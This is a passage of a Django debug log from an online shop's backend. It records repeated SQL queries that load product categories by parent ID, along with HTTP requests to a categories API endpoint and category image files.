"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:10:52,560 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:10:52,566 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:10:52,570 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:10:52,574 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:10:52,578 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:10:52,582 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:10:52,589 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:10:52,593 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:10:52,597 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:10:52,601 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:10:52,606 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:10:52,610 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:10:52,616 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:10:52,620 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:10:52,624 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:10:52,630 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:10:52,634 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:10:52] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:53] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 [13/Dec/2019 14:10:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 14:12:41,445 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:12:41,453 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:12:41,458 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:12:41,461 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:12:41,465 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:12:41,468 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:12:41,470 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:12:41,473 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:12:41,476 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:12:41,480 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:12:41,482 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:12:41,485 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:12:41,487 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:12:41,490 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:12:41,495 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:12:41,499 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:12:41,502 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:12:41,506 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:12:41,510 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:12:41,515 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:12:41,518 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:12:41,521 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:12:41,525 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:12:41,528 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:12:41,531 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:12:41,536 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:12:41,540 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:12:41,543 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:12:41,547 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:12:41,550 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:12:41,555 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:12:41,558 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:12:41,562 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:12:41,565 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:12:41,568 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:12:41,574 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:12:41,577 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:12:41,580 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:12:41,583 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:12:41,587 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:12:41,590 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:12:41,594 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:12:41,598 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:12:41,601 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:12:41,606 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:12:41,610 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:12:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:13:05,281 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:13:05,289 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:13:05,293 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", 